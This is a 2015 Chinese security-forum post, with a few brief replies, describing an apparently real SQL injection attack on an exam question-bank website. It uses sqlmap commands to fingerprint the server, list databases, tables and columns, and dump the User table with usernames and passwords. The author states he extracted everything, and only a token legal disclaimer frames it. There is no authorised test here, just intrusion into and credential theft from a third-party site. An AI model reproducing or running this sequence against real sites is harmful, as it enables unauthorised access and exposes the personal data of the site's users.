楼主: Msl

【原创】sqlmap之某考试题库站点

[复制链接]
  • TA的每日心情

    2016-2-23 12:24
  • 签到天数: 14 天

    [LV.3]偶尔看看II

    发表于 2015-4-12 01:03:16 | 显示全部楼层 |阅读模式
    本帖最后由 Msl 于 2015-4-12 01:13 编辑


       


                                                      #请遵守计算机法律!
      注意!本文章仅作交流使用,造成他人犯罪与作者无关!
    目标:某考试题库站点              ---Msl                     QQ:1920168505



    确定注入点后,在放到sqlmap里检测下

    打开终端,输入sqlmap –u http://www.xxx.com/xx.asp?id=xx

    1.png
    2.png
    3.png
    4.png








    从上图可看出,此站点存在注入,而且这个注入点是对的

    目标系统为Windows 2012 R2版本

    IIS版本8.5

    数据库mssqlserver 2012



    为了节省时间,我就直接找有用的数据吧···



    列出数据库

    sqlmap –u http://www.xxx.com/xx.asp?id=xx –dbs


    5.png
    6.png


          2.从上图可看出,目标站点数据库已经列出来了,上面三个是系统的,最下边的才是我想要的···



    接下来获取它的表

    sqlmap –u http://www.xxx.com/xx.asp?id=xx  --tables “xxx”

    7.png
    8.png






    出来了,接下来先看看User列

    sqlmap –u http://www.xxx.com/xx.asp?id=xx  --columns -T “User” -D “xxx”


    9.png
    10.png






    如果想单独获取username和password

    可以输入

    sqlmap –u http://www.xxx.com/xx.asp?id=xx  --dump –C “username,password” -T “User” -D “xxx”


    我就直接全脱出来吧

    sqlmap –u http://www.xxx.com/xx.asp?id=xx  --dump -T “User” -D “xxx”
    11.png






    由于网络问题,所以我改成了这个

    12.png
    13.png



    上图是效果图···

    好了,就到这里吧,后面就不给大家看了,毕竟数据公开不好~.~



    附上本人百度网盘分享链接http://pan.baidu.com/share/home?uk=3155889364&view=share#category/type=0
    挑选你需要的教程保存即可(别说我分享的太多你保存起来慢。。。)





    回复

    使用道具 举报

  • TA的每日心情
    无聊
    2016-8-19 10:32
  • 签到天数: 80 天

    [LV.6]常住居民II

    发表于 2015-4-12 21:07:10 | 显示全部楼层
    这是SQLmap科普吗?
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    慵懒
    2017-9-13 12:01
  • 签到天数: 364 天

    [LV.8]以坛为家I

    发表于 2015-5-23 21:32:00 | 显示全部楼层
    分享万岁。。。~\(≧▽≦)/~
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-27 21:15:01 | 显示全部楼层
    学习学习技术,加油!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-29 07:51:16 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-29 20:40:23 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-1 04:03:12 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-1 21:03:03 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-2 07:37:07 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-2 19:33:41 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-23 20:58 , Processed in 0.029828 second(s), 13 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部